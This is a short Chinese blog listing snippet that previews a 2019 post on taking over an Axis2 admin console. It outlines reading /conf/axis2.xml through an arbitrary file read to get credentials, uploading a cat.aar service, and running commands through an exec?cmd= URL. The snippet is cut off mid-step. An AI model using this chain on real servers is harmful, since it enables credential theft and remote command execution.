2019年3月21日
【实战】Axis2后台Getshell
摘要: 实战遇到的情况 任意文件读取,读取/conf/axis2.xml内容,读取用户名和密码登录后台 1、上传cat.aar 命令执行 http://xx.xx.xx.xx/axis2/services/Cat/exec?cmd=whoami 2、获取classpath路径 http://xx.xx.xx 阅读全文
posted @ 2019-03-21 09:28 Carrypan 阅读(2219) 评论(0) 推荐(0)